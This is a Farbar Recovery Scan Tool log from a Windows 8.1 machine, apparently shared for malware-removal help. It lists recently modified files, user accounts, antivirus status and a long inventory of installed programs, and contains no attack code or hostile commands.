2020-10-17 11:47 - 2020-03-23 23:01 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2020-10-16 19:58 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2020-10-16 19:46 - 2020-09-08 21:24 - 000000000 ____D C:\Program Files\Kite
2020-10-16 12:00 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2020-10-16 10:01 - 2020-03-04 22:12 - 000000000 ____D C:\Users\Tomika\AppData\Local\Arduino15
2020-10-16 09:28 - 2016-05-02 19:04 - 000103424 ____N C:\Windows\Minidump\101620-10890-01.dmp
2020-10-15 21:58 - 2016-05-02 19:22 - 000003386 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 21:58 - 2016-05-02 19:22 - 000003258 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 23:09 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2020-10-13 23:08 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2020-10-13 20:29 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2020-10-13 19:44 - 2019-01-01 12:24 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2020-10-13 19:44 - 2019-01-01 12:24 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\Macromed
2020-10-09 19:32 - 2016-05-08 15:48 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-09 00:17 - 2019-10-03 22:39 - 000003450 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-10-06 22:55 - 2016-05-26 22:56 - 000002296 ____H C:\Users\Tomika\Documents\Default.rdp
2020-10-06 22:54 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\FxsTmp
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Atom
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\.atom
2020-10-04 16:41 - 2020-03-07 15:26 - 000000000 ____D C:\Users\Tomika\.platformio
2020-10-04 16:30 - 2019-08-11 21:57 - 000002117 _____ C:\Users\Tomika\Desktop\Atom.lnk
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Local\atom
2020-10-04 12:49 - 2020-05-05 19:43 - 000002173 _____ C:\Users\Tomika\Desktop\Discord.lnk
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Local\Discord
2020-10-03 13:40 - 2016-12-17 10:05 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-10-03 01:24 - 2019-10-12 10:45 - 000001221 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-10-02 22:58 - 2013-08-22 17:38 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-02 22:58 - 2013-08-22 17:38 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-26 21:46 - 2016-11-19 00:31 - 000000000 ____D C:\Users\Tomika\Documents\My Games
2020-09-26 21:21 - 2017-07-14 22:38 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-09-25 15:51 - 2017-09-17 20:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\Users\Public\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\ProgramData\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\ProgramData\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\Users\Public\Desktop\Google Docs.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\ProgramData\Desktop\Google Docs.lnk
==================== Files in the root of some directories ========
2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
2016-08-03 17:39 - 2016-08-03 17:39 - 000001598 _____ () C:\Users\Tomika\AppData\Roaming\Pecture
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2019-04-28 23:18 - 2019-04-28 23:18 - 000001456 _____ () C:\Users\Tomika\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-05-01 16:56 - 2017-05-01 16:56 - 000000000 ___SH () C:\Users\Tomika\AppData\Local\LumaEmu
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2020-10-22 20:18
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-10-2020
Ran by Tomika (23-10-2020 10:45:47)
Running from C:\Users\Tomika\Desktop
Windows 8.1 Pro (Update) (X64) (2016-05-02 17:09:48)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2643689781-145595849-2857803826-500 - Administrator - Disabled)
Guest (S-1-5-21-2643689781-145595849-2857803826-501 - Limited - Disabled)
Tomika (S-1-5-21-2643689781-145595849-2857803826-1001 - Administrator - Enabled) => C:\Users\Tomika
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7 Billion Humans (HKLM-x32\...\2056114425_is1) (Version: 1.0.32472 - GOG.com)
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.08 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.0.327 - Adobe Systems Incorporated)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.445 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.1.1 - Adobe Systems Incorporated)
Adobe InDesign CC 2018 (HKLM-x32\...\IDSN_13_0) (Version: 13.0 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_0) (Version: 18.0.0 - Adobe Systems Incorporated)
Anaconda3 2020.02 (Python 3.7.6 64-bit) (HKLM\...\Anaconda3 2020.02 (Python 3.7.6 64-bit)) (Version: 2020.02 - Anaconda, Inc.)
Application Verifier x64 External Package (HKLM\...\{D9908CED-5ABB-FEE9-FC84-743F4D38637C}) (Version: 10.1.16299.15 - Microsoft) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.12 - Arduino LLC)
Assassin's Creed II (HKLM-x32\...\Uplay Install 4) (Version: - Ubisoft)
Atom (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\atom) (Version: 1.51.0 - GitHub Inc.)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.1.0.137 - Autodesk)
Autodesk Fusion 360 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.9144 - Autodesk, Inc.)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Netfabb Standard version 2017 (HKLM\...\{7F33137F-253B-418F-8600-0CC68A279528}}_is1) (Version: 2017 - Autodesk netfabb)
Autodesk_Netfabb_Standard_ADLM (HKLM\...\{95E20DC3-CA0C-4040-976B-0B9194396EB0}) (Version: 1.0.0.0 - Autodesk) Hidden
Backup and Sync from Google (HKLM\...\{B109BD68-709A-485B-97E6-651FEB234AC9}) (Version: 3.51.3307.8076 - Google, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blender (HKLM\...\{A0C803A1-310C-4EFF-B881-CA10CF7CD6A7}) (Version: 2.90.1 - Blender Foundation)
Blender (HKLM\...\{A239FF96-639F-4269-9673-E7ED60D5C74D}) (Version: 2.83.3 - Blender Foundation)
Blender (HKLM\...\{A6B045E1-6F1C-4FCD-936A-EE272B675EC8}) (Version: 2.81.1 - Blender Foundation)
Blender (HKLM\...\{EDFAE2A8-E73B-4CD1-9648-46A7E4434BDA}) (Version: 2.82.1 - Blender Foundation)
Blender (HKLM\...\{F343C69A-4ABA-434C-9C73-12A519D269CD}) (Version: 2.80.0 - Blender Foundation)
Bloody7 (HKLM-x32\...\Bloody3) (Version: 20.02.0002 - Bloody)
Call of Duty 2 version 1.3.0.0 (HKLM-x32\...\Call of Duty 2_is1) (Version: 1.3.0.0 - Mr DJ)
Call of Duty 4 - Modern Warfare (HKLM-x32\...\Call of Duty 4 - Modern Warfare_is1) (Version: - )
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.7 - Activision)
Call of Duty: Modern Warfare 2 (HKLM-x32\...\Call of Duty: Modern Warfare 2_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.71 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
DaVinci Resolve (HKLM\...\{395391BE-FF9A-4A2A-BA89-0EAE0DB0F37B}) (Version: 15.3.0008 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{B1782967-E600-4BBD-B2F1-AEF3F2FE0A12}) (Version: 1.2.1.0 - Blackmagic Design)
Desperados 3 (HKLM-x32\...\Desperados 3_is1) (Version: - )
Discord (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Discord) (Version: 0.0.308 - Discord Inc.)
Driver Booster 7 (HKLM-x32\...\Driver Booster_is1) (Version: 7.2.0 - IObit)
Epic Games Launcher (HKLM-x32\...\{C69A2919-0662-4390-9418-67C931B44C18}) (Version: 1.1.236.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Git version 2.28.0 (HKLM\...\Git_is1) (Version: 2.28.0 - The Git Development Community)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 86.0.4240.111 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Grammarly for Microsoft® Office Suite (HKLM\...\{4A6C3487-B58C-4A7D-B224-499CA5F99A7B}) (Version: 6.7.217 - Grammarly) Hidden
Grammarly for Microsoft® Office Suite (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{b7cd3fad-1dd9-41df-9c0c-688b0f8cd287}) (Version: 6.7.217 - Grammarly)
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Human Resource Machine (HKLM-x32\...\1444812654_is1) (Version: 1.0.31924 - GOG.com)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5074 - Intel Corporation)
Java 10.0.1 (64-bit) (HKLM\...\{D33DF729-38BB-5651-9D40-93BFEFB5DCED}) (Version: 10.0.1.0 - Oracle Corporation)
Kite (HKLM\...\Kite) (Version: - Manhattan Engineering Inc)
Kits Configuration Installer (HKLM-x32\...\{86E59C8F-61D5-1782-A3CE-60AE7E4D7791}) (Version: 10.1.16299.15 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lindo 2.4.0 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\fcf71806-bbf8-5201-910f-7499961bc8e8) (Version: 2.4.0 - Prixe)
LLVM (HKLM-x32\...\LLVM) (Version: 3.9.1 - LLVM)
Media Player Codec Pack 4.4.8 (HKLM-x32\...\Media Player - Codec Pack) (Version: 4.4.8 - Media Player Codec Pack)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Mendeley Desktop 1.17.6 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.6 - Mendeley Ltd.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 83.0.478.50 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.129.37 - )
Microsoft Mathematics Add-in (64-bit) (HKLM\...\{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.040811.01 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.50.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1089.1204 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 3.1.3 (x64) (HKLM-x32\...\{f7152f3d-2c9d-4752-8a92-045a03b85f42}) (Version: 3.1.3.28628 - Microsoft Corporation)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 72.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 72.0.2 (x64 cs)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.1.2 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 cs) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 cs)) (Version: 68.12.1 - Mozilla)
MSI Development Tools (HKLM-x32\...\{973CACA2-E018-065B-0580-F2784802E299}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
MY.GAMES GameCenter (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\GameCenter) (Version: 4.1561 - MY.COM B.V.)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2013 - slovenčina (HKLM\...\{90150000-001F-041B-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.7 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 0.9990 - Nmap Project)
Nuked Cockroach Launcher 0.9.12 (HKLM-x32\...\Nuked Cockroach Launcher) (Version: 0.9.12 - Nuked Cockroach Studio)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Miracast Virtual Audio 378.78 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 378.78 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
odrive (HKLM\...\{32AA7EE2-2DA0-4CD9-ACD1-5D205E7A3F63}) (Version: 1.00.6236 - Oxygen Cloud, Inc.) Hidden
odrive (HKLM-x32\...\{e6ab88b8-5dd2-44c5-8ef1-6c2a7b48199b}) (Version: 1.0.6236 - Oxygen Cloud, Inc.)
Open 3D Model Viewer (HKLM-x32\...\{EBDFEC36-5277-454F-875B-F0AA2CDC3C92}) (Version: 1.10.0000 - Alexander Gessler)
Origin91 (HKLM-x32\...\{ADC55813-F4DD-47AA-94F3-CA35E1447E26}) (Version: 9.10.00 - OriginLab Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PotPlayer-64 bit (HKLM\...\PotPlayer64) (Version: 200525 - Kakao Corp.)
PowDLL Converter 2.86 (HKLM-x32\...\PowDLL Converter) (Version: 2.86 - Nikolaos Kourkoumelis)
PPspliT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\PPspliT) (Version: 1.17 - )
Profex (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{d7553a1d-aae9-4f43-a693-9dcc4e118c61}) (Version: 4.0.0 - doebelin.org)
Prusa3D version 2.2.9.1 (HKLM\...\Prusa3D_is1) (Version: 2.2.9.1 - Prusa Research a.s.)
PrusaSlicer version 2.2.0 (HKLM\...\PrusaSlicer_is1) (Version: 2.2.0 - Prusa Research s.r.o.)
PureRef (HKLM-x32\...\PureRef) (Version: 1.9.2 - Idyllic Pixel)
Python 3.7.5 (64-bit) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{5e6d7bfa-46e9-4496-9ccd-e15816be8f0a}) (Version: 3.7.5150.0 - Python Software Foundation)
Python 3.7.5 Core Interpreter (64-bit) (HKLM\...\{6DC6BC71-F1FB-412D-A16A-2FE8C463E89F}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Development Libraries (64-bit) (HKLM\...\{5A54B213-36D8-40CB-9E55-D20864AEF3C8}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Executables (64-bit) (HKLM\...\{8864B390-4DFB-43AB-934B-F02C48577666}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 pip Bootstrap (64-bit) (HKLM\...\{2E590D5A-4E40-4C9C-AFF8-7CB80F085752}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Standard Library (64-bit) (HKLM\...\{45CB356A-C0DF-430E-B75F-7764DBA06DF9}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Utility Scripts (64-bit) (HKLM\...\{EFF40415-0D5B-4CBA-9080-3EE2DADB527C}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
qBittorrent 4.2.1 (HKLM-x32\...\qBittorrent) (Version: 4.2.1 - The qBittorrent project)
R for Windows 3.5.0 (HKLM\...\R for Windows 3.5.0_is1) (Version: 3.5.0 - R Core Team)
RDT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\RDT) (Version: 0.7.28 - Gamers Net Inc)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.1.0.1120 - Samsung Electronics)
SDK ARM Additions (HKLM-x32\...\{7922BB77-0B59-840A-AC80-D560A34D75C5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{C87DF65C-A672-7E08-A083-E7D48FE8DB70}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
SigmaPlot 11.0 (HKLM-x32\...\{B1A88375-BAB9-4081-B58F-A137FC6ED2A4}) (Version: 11.0 - Systat Software, Inc.)
Skype version 8.63 (HKLM-x32\...\Skype_is1) (Version: 8.63 - Skype Technologies S.A.)
StarCraft II Legacy of the Void (HKLM\...\U3RhckNyYWZ0SUk=_is1) (Version: 1 - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StyleWriter 4 (HKLM-x32\...\{D770F0F3-650B-4D7A-945D-49ADB1182BD9}) (Version: 4.02.02 - Editor Software (UK) Ltd)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
The Witcher 3: Wild Hunt - Game of the Year Edition (HKLM-x32\...\1495134320_is1) (Version: 1.32 - GOG.com)
They Are Billions (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\They Are Billions) (Version: - HOODLUM)
Universal CRT Extension SDK (HKLM-x32\...\{A5FA2886-1925-133F-0D41-B9A8ECEA0A2D}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{B739B4C5-EEEC-8E70-0276-38C4779AF398}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{A9D6F52C-694E-3E41-7AB8-5BEB644742A5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{E053089E-7953-3219-814F-F485FC151C54}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{B9424F08-0617-C4F6-A798-5A9250C1A738}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{D261CEA1-AB8D-9CFA-4407-BCEFC78661AC}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
